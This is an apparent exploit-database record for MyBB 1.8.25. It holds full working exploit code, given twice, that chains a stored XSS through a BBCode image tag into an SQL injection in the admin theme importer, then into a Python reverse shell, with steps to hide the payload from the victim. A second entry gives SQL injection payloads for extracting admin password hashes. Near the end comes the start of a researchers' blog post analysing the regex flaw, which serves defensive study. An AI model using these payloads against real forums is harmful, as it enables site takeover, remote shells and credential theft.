MyBB 1.8.25 Remote Command Execution

2021-03-22T00:00:00

Description

{"id": "PACKETSTORM:161908", "type": "packetstorm", "bulletinFamily": "exploit", "title": "MyBB 1.8.25 Remote Command Execution", "description": "", "published": "2021-03-22T00:00:00", "modified": "2021-03-22T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://packetstormsecurity.com/files/161908/MyBB-1.8.25-Remote-Command-Execution.html", "reporter": "SivertPL", "references": [], "cvelist": ["CVE-2021-27889", "CVE-2021-27890"], "lastseen": "2021-03-22T15:33:24", "viewCount": 167, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27889", "CVE-2021-27890"]}, {"type": "exploitdb", "idList": ["EDB-ID:49696", "EDB-ID:49699"]}, {"type": "githubexploit", "idList": ["828FD9AF-C840-5F1E-97D2-D89A4D7B5A82"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161918"]}, {"type": "seebug", "idList": ["SSV:99162"]}, {"type": "thn", "idList": ["THN:3152B45B015211515D21C5C8A05763F5"]}, {"type": "zdt", "idList": ["1337DAY-ID-36006", "1337DAY-ID-36010"]}], "rev": 4}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-27889", "CVE-2021-27890"]}, {"type": "exploitdb", "idList": ["EDB-ID:49696", "EDB-ID:49699"]}, {"type": "githubexploit", "idList": ["828FD9AF-C840-5F1E-97D2-D89A4D7B5A82"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161918"]}, {"type": "seebug", "idList": ["SSV:99162"]}, {"type": "thn", "idList": ["THN:3152B45B015211515D21C5C8A05763F5"]}, {"type": "zdt", "idList": ["1337DAY-ID-36006", "1337DAY-ID-36010"]}]}, "exploitation": null, "vulnersScore": 6.5}, "sourceHref": "https://packetstormsecurity.com/files/download/161908/mybb1825-exec.txt", "sourceData": "`# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution \n# Exploit Author: SivertPL (kroppoloe@protonmail.ch) \n# Date: 19.03.2021 \n# Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval(). \n# Software Link: https://resources.mybb.com/downloads/mybb_1825.zip \n# CVE: CVE-2021-27889, CVE-2021-27890 \n \nReference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums \n \nThe exploit requires the target administrator to have a valid ACP session. \n \nProof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ \n \nGuide: \n \n1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it. \n \nPlease replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target. \n \ndocument.write('<script src=http://localhost:8000/second_stage.js></script>'); \n \n2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment. \n \nYou can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/ \n \n3) Put the resulting encoded payload in the nested autourl vulnerability vector: \n \n[img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img] \n \n4) The final payload should look like this: \n \n[img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img] \n \n5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported. \nOnce the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP. \n \nAfter the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session. \n \n6) Enjoy your RCE! For educational purposes only. \n \n*/ \n \nconstREVERSE_SHELL_IP = \"localhost\"; \nconstREVERSE_SHELL_PORT = 5554; \n \nconstPAYLOAD_XML_NAME = \"payload\"; \nconstPAYLOAD_XML_VERSION = \"1821\"; \n \nconstXML_PROLOG = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\"; \n \nconstSHELL_PAYLOAD = \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\" + REVERSE_SHELL_IP + \"\\\",\" + REVERSE_SHELL_PORT + \"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\" \nconstSQL_PAYLOAD = \"') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\\\'\" + btoa(SHELL_PAYLOAD) + \"\\\\'))}' from mybb_templates -- \"; \n \n// Trigger the actual vulnerability, force cache reload. \n// Stage: Final \nfunctiontrigger() { \nvarrequest = newXMLHttpRequest(); \n \nrequest.open('GET', '/index.php'); \nrequest.send(); \n} \n \n// Poison the cache. \n// Stage: 6 \nfunctionset_as_default(token, tid) { \n \nvarrequest = newXMLHttpRequest(); \n \nrequest.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token); \n \nrequest.onload = function() { trigger(); }; \n \nrequest.send(); \n} \n \n// Get the TID of the downloaded theme payload \n// Stage: 5 \nfunctionget_payload_tid(token) { \nvarrequest = newXMLHttpRequest(); \n \nrequest.open('GET', '/admin/index.php?module=style-themes'); \n \nrequest.responseType = \"document\"; \n \nrequest.onload = function() { \n \nvarresponse = request.response; \n \nvaraTags = response.getElementsByTagName(\"a\"); \nvarsearchText = \"payload\"; \nvarfound; \n \nfor (vari = 0; i < aTags.length; i++) { \nif (aTags[i].textContent == searchText) { \nfound = aTags[i]; \nbreak; \n} \n} \n \nvarhref = found.getAttribute(\"href\"); \n \nvarurlParams = newURLSearchParams(href); \n \nvartid = urlParams.get(\"tid\"); \n \nset_as_default(token, tid); \n}; \n \nrequest.send(); \n \n} \n \n// We pass the actual request to upload the template exploiting the second link of the exploit chain \n// Stage: 4 \nfunctionupload_template(token) { \n \nvarrequest = newXMLHttpRequest(); \n \nrequest.open('POST', '/admin/index.php?module=style-themes&action=import'); \n \nvardata = newFormData(); \n \ndata.append('my_post_key', token); \ndata.append('local_file', build_payload(), PAYLOAD_XML_NAME + \".xml\"); \ndata.append('import', 0); \ndata.append('url', ''); \ndata.append('tid', '1'); \ndata.append('name', \"payload\"); \ndata.append(\"version_compat\", 1); \ndata.append(\"import_stylesheets\", 1); \ndata.append(\"import_templates\", 1); \n \nrequest.onload = function() { \n// After uploading the template, set it as default to poison the cache \nget_payload_tid(token) \n}; \n \nrequest.send(data); \n} \n \n// Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation. \n// Stage: 3 \nfunctionbuild_payload() { \nvarxmlDom = document.implementation.createDocument(\"\", \"\", null); \n \nvartheme = xmlDom.createElement(\"theme\"); \ntheme.setAttribute(\"name\", PAYLOAD_XML_NAME); \ntheme.setAttribute(\"version\", PAYLOAD_XML_VERSION); \n \nvarproperties = xmlDom.createElement(\"properties\"); \ntheme.appendChild(properties); \n \nvartemplate_set = xmlDom.createElement(\"templateset\"); \ntemplate_set.innerHTML = SQL_PAYLOAD; \nproperties.appendChild(template_set); \n \nxmlDom.appendChild(theme); \n \nvarserialized = newXMLSerializer().serializeToString(xmlDom); \n \nvarresult = XML_PROLOG + serialized; \nvarfile = newFile([result], PAYLOAD_XML_NAME); \n \nreturnfile; \n} \n \n// Acquire the anti-CSRF token \n// Stage: 2 \nfunctionacquire_token(request) { \n \nvarresponse = request.response; \nvartoken = response.getElementsByName(\"my_post_key\")[0].value; \n \nif(token == null) { \n/* ACP Session either expired or wasn't established to begin with */ \nreturn; \n} \n \n// We have acquired the anti-CSRF token now. \nupload_template(token); \n} \n \n// ACP Code Execution \n// Stage: 1 \nfunctionexec_acp() { \n \nvarrequest = newXMLHttpRequest(); \n \nrequest.open('GET', 'admin/index.php?module=style-themes&action=import'); \nrequest.responseType = \"document\"; \n \nrequest.onload = function() { \nacquire_token(request); \n}; \n \nrequest.send(); \n} \n \n// We hide the payload, to raise less suspicions \n// Stage: 0 \nfunctionhide() { \n \nvargetAll = document.querySelectorAll(\"[src*='http://xyzsomething.com/image?)<a href=']\"); \n \ngetAll.forEach(element=> { \nvarpNode = element.parentNode.innerText=\"lmao whatever you say\"; \n}); \n \n} \n \n// Entry point of the exploit \nfunctionstart() { \nhide(); \nexec_acp(); \n} \n \nstart(); \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646005718}}

{"zdt": [{"lastseen": "2021-10-01T00:49:11", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-22T00:00:00", "type": "zdt", "title": "MyBB 1.8.25 - Chained Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889", "CVE-2021-27890"], "modified": "2021-03-22T00:00:00", "id": "1337DAY-ID-36006", "href": "https://0day.today/exploit/description/36006", "sourceData": "# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution\r\n# Exploit Author: SivertPL ([email\u00a0protected])\r\n# Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval().\r\n# Software Link: https://resources.mybb.com/downloads/mybb_1825.zip\r\n# CVE: CVE-2021-27889, CVE-2021-27890\r\n\r\nReference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums\r\n\r\nThe exploit requires the target administrator to have a valid ACP session.\r\n\r\nProof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ\r\n\r\nGuide:\r\n\r\n1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it.\r\n\r\nPlease replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target.\r\n\r\ndocument.write('<script src=http://localhost:8000/second_stage.js></script>');\r\n\r\n2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment.\r\n\r\nYou can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/\r\n\r\n3) Put the resulting encoded payload in the nested autourl vulnerability vector:\r\n\r\n[img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]\r\n\r\n4) The final payload should look like this:\r\n\r\n[img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]\r\n\r\n5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported.\r\nOnce the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP.\r\n\r\nAfter the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.\r\n\r\n6) Enjoy your RCE! For educational purposes only.\r\n\r\n*/\r\n\r\nconstREVERSE_SHELL_IP = \"localhost\";\r\nconstREVERSE_SHELL_PORT = 5554;\r\n\r\nconstPAYLOAD_XML_NAME = \"payload\";\r\nconstPAYLOAD_XML_VERSION = \"1821\";\r\n\r\nconstXML_PROLOG = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\";\r\n\r\nconstSHELL_PAYLOAD = \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\" + REVERSE_SHELL_IP + \"\\\",\" + REVERSE_SHELL_PORT + \"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\nconstSQL_PAYLOAD = \"') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\\\'\" + btoa(SHELL_PAYLOAD) + \"\\\\'))}' from mybb_templates -- \";\r\n\r\n// Trigger the actual vulnerability, force cache reload.\r\n// Stage: Final\r\nfunctiontrigger() {\r\nvarrequest = newXMLHttpRequest();\r\n\r\nrequest.open('GET', '/index.php');\r\nrequest.send();\r\n}\r\n\r\n// Poison the cache.\r\n// Stage: 6\r\nfunctionset_as_default(token, tid) {\r\n\r\nvarrequest = newXMLHttpRequest();\r\n\r\nrequest.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);\r\n\r\nrequest.onload = function() { trigger(); };\r\n\r\nrequest.send();\r\n}\r\n\r\n// Get the TID of the downloaded theme payload\r\n// Stage: 5\r\nfunctionget_payload_tid(token) {\r\nvarrequest = newXMLHttpRequest();\r\n\r\nrequest.open('GET', '/admin/index.php?module=style-themes');\r\n\r\nrequest.responseType = \"document\";\r\n\r\nrequest.onload = function() {\r\n\r\nvarresponse = request.response;\r\n\r\nvaraTags = response.getElementsByTagName(\"a\");\r\nvarsearchText = \"payload\";\r\nvarfound;\r\n\r\nfor (vari = 0; i < aTags.length; i++) {\r\nif (aTags[i].textContent == searchText) {\r\nfound = aTags[i];\r\nbreak;\r\n}\r\n}\r\n\r\nvarhref = found.getAttribute(\"href\");\r\n\r\nvarurlParams = newURLSearchParams(href);\r\n\r\nvartid = urlParams.get(\"tid\");\r\n\r\nset_as_default(token, tid);\r\n};\r\n\r\nrequest.send();\r\n\r\n}\r\n\r\n// We pass the actual request to upload the template exploiting the second link of the exploit chain\r\n// Stage: 4\r\nfunctionupload_template(token) {\r\n\r\nvarrequest = newXMLHttpRequest();\r\n\r\nrequest.open('POST', '/admin/index.php?module=style-themes&action=import');\r\n\r\nvardata = newFormData();\r\n\r\ndata.append('my_post_key', token);\r\ndata.append('local_file', build_payload(), PAYLOAD_XML_NAME + \".xml\");\r\ndata.append('import', 0);\r\ndata.append('url', '');\r\ndata.append('tid', '1');\r\ndata.append('name', \"payload\");\r\ndata.append(\"version_compat\", 1);\r\ndata.append(\"import_stylesheets\", 1);\r\ndata.append(\"import_templates\", 1);\r\n\r\nrequest.onload = function() {\r\n// After uploading the template, set it as default to poison the cache\r\nget_payload_tid(token)\r\n};\r\n\r\nrequest.send(data);\r\n}\r\n\r\n// Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation.\r\n// Stage: 3\r\nfunctionbuild_payload() {\r\nvarxmlDom = document.implementation.createDocument(\"\", \"\", null);\r\n\r\nvartheme = xmlDom.createElement(\"theme\");\r\ntheme.setAttribute(\"name\", PAYLOAD_XML_NAME);\r\ntheme.setAttribute(\"version\", PAYLOAD_XML_VERSION);\r\n\r\nvarproperties = xmlDom.createElement(\"properties\");\r\ntheme.appendChild(properties);\r\n\r\nvartemplate_set = xmlDom.createElement(\"templateset\");\r\ntemplate_set.innerHTML = SQL_PAYLOAD;\r\nproperties.appendChild(template_set);\r\n\r\nxmlDom.appendChild(theme);\r\n\r\nvarserialized = newXMLSerializer().serializeToString(xmlDom);\r\n\r\nvarresult = XML_PROLOG + serialized;\r\nvarfile = newFile([result], PAYLOAD_XML_NAME);\r\n\r\nreturnfile;\r\n}\r\n\r\n// Acquire the anti-CSRF token\r\n// Stage: 2\r\nfunctionacquire_token(request) {\r\n\r\nvarresponse = request.response;\r\nvartoken = response.getElementsByName(\"my_post_key\")[0].value;\r\n\r\nif(token == null) {\r\n/* ACP Session either expired or wasn't established to begin with */\r\nreturn;\r\n}\r\n\r\n// We have acquired the anti-CSRF token now.\r\nupload_template(token);\r\n}\r\n\r\n// ACP Code Execution\r\n// Stage: 1\r\nfunctionexec_acp() {\r\n\r\nvarrequest = newXMLHttpRequest();\r\n\r\nrequest.open('GET', 'admin/index.php?module=style-themes&action=import');\r\nrequest.responseType = \"document\";\r\n\r\nrequest.onload = function() {\r\nacquire_token(request);\r\n};\r\n\r\nrequest.send();\r\n}\r\n\r\n// We hide the payload, to raise less suspicions\r\n// Stage: 0\r\nfunctionhide() {\r\n\r\nvargetAll = document.querySelectorAll(\"[src*='http://xyzsomething.com/image?)<a href=']\");\r\n\r\ngetAll.forEach(element=> {\r\nvarpNode = element.parentNode.innerText=\"lmao whatever you say\";\r\n});\r\n\r\n}\r\n\r\n// Entry point of the exploit\r\nfunctionstart() {\r\nhide();\r\nexec_acp();\r\n}\r\n\r\nstart();\n\n# 0day.today [2021-10-01] #", "sourceHref": "https://0day.today/exploit/36006", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-01T00:49:07", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-23T00:00:00", "type": "zdt", "title": "MyBB 1.8.25 - Poll Vote Count SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889", "CVE-2021-27946"], "modified": "2021-03-23T00:00:00", "id": "1337DAY-ID-36010", "href": "https://0day.today/exploit/description/36010", "sourceData": "# Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection\r\n# Exploit Author: SivertPL ([email\u00a0protected])\r\n# Description: Lack of sanitization in the \"votes[]\" parameter in \"Edit Poll\" causes a second-order semi-blind SQL Injection that is triggered when performing a \"Move/Copy\" operation on the thread.\r\n# Sofware Link: https://resources.mybb.com/downloads/mybb_1825.zip\r\n# CVE: CVE-2021-27946\r\n\r\nReferences:\r\n\r\n 1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums \r\n 2) https://vuldb.com/?id.171307\r\n 3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch \r\n\r\nIn order to trigger the vulnerability, you must have permission to edit polls. \r\nModerators and administrators can usually do it, but in some configurations regular users can do it as well.\r\n\r\nIn case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash.\r\n\r\nOtherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary\r\ninjections automatically, and send the resulting hashes to your server.\r\n\r\nThis is a pretty nasty vulnerability to exploit by hand (at least on regular, most common MySQL setup), but can be dangerous in the hands of \r\na very determined attacker who combines it with CVE-2021-27889 and an automated Javascript-Based SQL Injector.\r\n\r\nThis vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used.\r\nIn such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash).\r\n\r\nGuide:\r\n\r\n1) Make a thread with a public poll, with multiple choices.\r\n\r\n2) Vote on at least one choice.\r\n\r\n3) Go to the \"Edit poll\" section of the poll.\r\n\r\n4) Place the following payload in the \"vote count\" input (any entry within the votes[] parameter in the resulting POST request).\r\n\r\n 1','2',ascii((select version())),'0','0','1','1') -- -a\r\n\r\n5) Save the poll.\r\n\r\n6) Perform a \"Move/Copy\" operation on the thread, moving it to a different forum, or making a copy in the same forum.\r\n\r\nThis is where the SQL Injection is triggered, and you should see an SQL Error here if the payload is incorrect.\r\n\r\n7) Go to the copied/moved version of the thread (you should be redirected there automatically).\r\n\r\n8) Go to the \"Show Results\" section of the poll.\r\n\r\n9) The total vote count under the poll is our 64 bit unsigned integer covert channel to retrieve information from the ascii select query. \r\n\r\nSince this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()).\r\nOther parameters in the INSERT query that we are injecting into are either too small, or unfeasible. \r\nUnsigned integer provides enough space to extract required data when enough requests are made.\r\n\r\nIn this case, the number is the ASCII code of the first character of the result of the injected select version() query.\r\nThis way we can transfer the output through this covert channel, one character at a time.\r\n\r\nIn order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int.\r\n\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 2, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 3, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 4, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 5, 1))),'0','0','1','1') -- -a\r\n\r\n... etc.\r\n\r\nThis will send the ASCII codes of every char of the hashed password through the integer covert channel.\r\n\r\n\r\n10) After sending enough requests, you should have the hashed admin password. Repeat the entire process to acquire the salt.\n\n# 0day.today [2021-10-01] #", "sourceHref": "https://0day.today/exploit/36010", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T15:19:52", "description": "# Mybb-XSS_SQL_RCE-POC\r\nMybb associate CVE-2021-27890 & CVE-...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-25T06:00:31", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Mybb", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889", "CVE-2021-27890"], "modified": "2021-05-08T06:58:30", "id": "828FD9AF-C840-5F1E-97D2-D89A4D7B5A82", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "seebug": [{"lastseen": "2021-07-24T16:03:14", "description": "# MyBB Remote Code Execution Chain\n\nBY SIMON SCANNELL & CARL SMITH\n\n![MyBB Remote Code Execution](https://images.seebug.org/1616145075151-w331s)\n\n*Today SonarSource is pleased to share with you a guest contribution to our [Code Security blog series](https://blog.sonarsource.com/tag/security). The following blog post is authored by Simon Scannell and Carl Smith -two independent security researchers- joining us in sharing their findings of real world vulnerabilities and how they directly relate to Code Security. Over to you Simon and Carl!*\n\nLike all IT security enthusiasts, we love to grow our knowledge by looking through a variety of applications, and taking up some contests such as playing *capture the flag*. Lately, we decided to look at forum software to create a CTF challenge and detected a chain of serious vulnerabilities in MyBB, one of the most popular open source bulletin boards. In a followup to SonarSource\u2019s recent series of posts about the [challenges](https://blog.sonarsource.com/regular-expressions-present-challenges) of [regular](https://blog.sonarsource.com/setting-the-right-regex-boundaries-is-important) [expressions](https://blog.sonarsource.com/crafting-regexes-to-avoid-stack-overflows), we would like to share our code vulnerability findings in MyBB that are based on defective regexes.\n\n## Impact\n\nMyBB forums with versions between and including **1.8.16** and **1.8.25** are affected by two vulnerabilities we discovered that can be chained together to achieve Remote Code Execution (RCE) without any prior access to a privileged account on default MyBB-configurations. The first vulnerability (Nested Auto URL persistent XSS \u2014 CVE-2021-27889) reported by us was an issue in the MyBB rendering process that enabled any unprivileged forum user of a MyBB board to embed Stored XSS payloads into threads, posts and even private messages. \n\nThe second vulnerability (Theme properties SQL injection \u2014 CVE-2021-27890) that was reported by us was an SQL injection which led to RCE and could be triggered by any user with an active session in the administrator dashboard of a MyBB forum. \n\nA sophisticated attacker could develop an exploit for the Stored XSS vulnerability and then send a private message to a targeted administrator of a MyBB board. As soon as the administrator opens the private message, on his own trusted forum, the exploit triggers. An RCE vulnerability is automatically exploited in the background and leads to a full takeover of the targeted MyBB forum.\n\n## Technical Details\n\n\n\n### Persistent XSS in Nested Auto URL (CVE-2021-27889)\n\nModern forum software such as MyBB commonly enables unprivileged users to create posts or private messages containing images, videos, headlines, lists and so on. \n\nThis feature must be carefully implemented, as untrusted users could abuse it to modify the contents of the forum in undesired ways if the constraints of this feature are not strict enough. Worst case, a user could gain the ability to inject arbitrary JavaScript code into the HTML documents served by the trusted forum.\n\nIn our experience, we have observed two approaches to implement this feature:\n\n1. Allow users to submit HTML tags and apply an allow or deny list to determine whether the input is sane and safe to display to other users.\n2. Use an existing or custom message format, such as Markdown for example, to create sane HTML outputs from inputs.\n\nBoth approaches come with their respective advantages and disadvantages. MyBB utilizes the second approach in their rendering process with a custom implementation of their *MyCodes*.\n\nHere are 2 examples of how such a *MyCode* would look like and how it is converted:\n\n```\n[url]https://blog.sonarsource.com[/url]\n = <a href=\"https://blog.sonarsource.com\">https://blog.sonarsource.com</a>\n[b]Hello, World![/b] \n = <strong>Hello, World!</strong>\n```\n\nWhenever a user creates for example a private message containing such codes, the MyBB parser encodes the entire input and then utilizes a regex to find and replace all MyCodes with their respective HTML code.\n\nProblems in such parsers can occur when the regex patterns used to find and replace e.g. MyCodes are too relaxed which could lead to nested HTML tags being rendered, as is the case with the XSS we are breaking down here.\n\nAnother, less explicit, step of the MyBB rendering process is to automatically detect URLs which were not wrapped with the [URL] MyCode and to convert them into HTML links. The following snippet shows how the $message variable is passed to the mycode_auto_url() method of the renderer class:\n\n**mybb/inc/class_parser.php**\n\n```\n 525 if($mybb->settings['allowautourl'] == 1)\n 526 {\n 527 $message = $this->mycode_auto_url($message);\n 528 }\n 529 \n 530 return $message;\n```\n\nThe $message variable in line 527 contains the already rendered HTML result of the user supplied message and thus must be carefully handled so that no HTML tags or attributes could be corrupted. The condition for this is that only URLs that are not part of an HTML tag are allowed to be converted into <a> tags.\n\nMyBB utilized the following regex to try to securely parse only URLs that are not part of an HTML tag (the regex was simplified by stripping away all parts that were not relevant for understanding this vulnerability):\n\n**mybb/inc/class_parser.php**\n\n```\n1618 $message = preg_replace_callback(\n \"#<a\\\\s[^>]*>.*?</a>|([\\s\$\$\\[\\>])(www|ftp)\\.([\\w|\\d\\-./]+)#ius\", \n array($this, 'mycode_auto_url_callback'), \n $message);\n```\n\nThe regex is divided by the | character into two alternatives:\n\n1. Match anything between <a> tags (<a\\\\s[^>]*>.*?</a>). In case of such a match, nothing is changed\n2. The URL match must begin with either a whitespace, parentheses or an opening square bracket ([) or a closing angle bracket (>) and is then followed by a URL (this is the simplified part). The logic here is that when a user-supplied MyCode is converted into HTML, although user controlled data can be embedded into an HTML attribute of the resulting HTML tag, it cannot contain any of these characters. \n\nAs an example, when an [img] MyCode is converted to HTML, it could look like this:\n\n```\n[img]http://xyzsomething.com/image.png[/img]\n = <img src=\"http://xyzsomething.com/image.png\" />\n```\n\nWhen such an image tag is constructed, the URL that is going to form the src attribute is stripped of all whitespaces and is HTML and URL encoded. The idea was that these transformations would remove all characters that could be matched by the second alternative of the regex which is used for the auto URL encode. Therefore the second part assumes that the first transformation has already *cleaned* the URL.\n\nHowever, both URL encoding and HTML encoding do not modify parentheses (). Thus, it was possible to craft an [img] tag such as the one shown below, which invalidates this assumption thus confusing the second regex.\n\n```\n[img]http://xyzsomething.com/image?)http://x.com/onerror=alert(1);//[/img]\n```\n\nIn the first step of the rendering process, the following <img> tag would have been created:\n\n```\n<img src=\"http://xyzsomething.com/image?)http://x.com/onerror=alert(1);//\">\n```\n\nIn the next step, the mycode_auto_url() method matches the second URL in the image as it begins with a closing parenthesis which has not been escaped or encoded. The final HTML that is created then looks like this:\n\n```\n<img src=\"http://xyzsomething.com/image?)<a href=\" http:=\"\" x.com=\"\" \n onerror=\"alert(1);//"\" target=\"_blank\" 